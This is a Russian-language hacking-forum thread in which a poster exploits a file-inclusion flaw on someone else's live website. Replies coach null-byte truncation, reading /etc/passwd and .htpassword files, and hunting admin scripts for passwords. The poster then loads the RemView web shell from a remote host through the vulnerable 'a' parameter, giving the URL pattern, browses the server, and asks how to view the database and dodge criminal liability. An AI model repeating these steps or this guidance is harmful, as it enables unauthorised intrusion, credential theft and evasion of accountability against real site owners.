Нашел небольшую дырочку на одном сайте, нужен совет
 

отредактировал. Вдруг их адним тоже на античат вздумает зайти :)

Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE.
Тоесть чтобы экранировать .txt можно использовать %00
Во вторых, чтоже можно сделать чтением файлов?
Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =)

Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров.

Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.

Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу.

не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно..
Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.

так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР,
Залил ремвью через форум, только незнаю в какой папке лежит.
+ там же файл переименовывается. Форум Инвижен 2.0 )

ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ" :)

Народ, теперь такой вопросец:
я можно сказать - начинающий. и работаю даже не через проксю :) Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности. :)

хех.. рано обрадовался:

ремвью запускаю так:

http://victim.com/index.php?a=http:/...men.ru/remview

запускается ремвью, но все ссылки в нем такого вида:
http://victim.com/index.php?&c=v&d=d...2F&f=about.txt

вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?

в любом случае остается возможность запуска любого Мускульного кода.
Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?

ой немогу :) нормально ремвью работает, просто нужно добавлять параметры так

http://victim.com/index.php?a=http:/...%2Fwww%2Fadmin

ну похвально, сам находишь ответы =)

а по поводу моей анонимности, подскажите пожалуйста.

и по поводу просмотра структуры БД ;)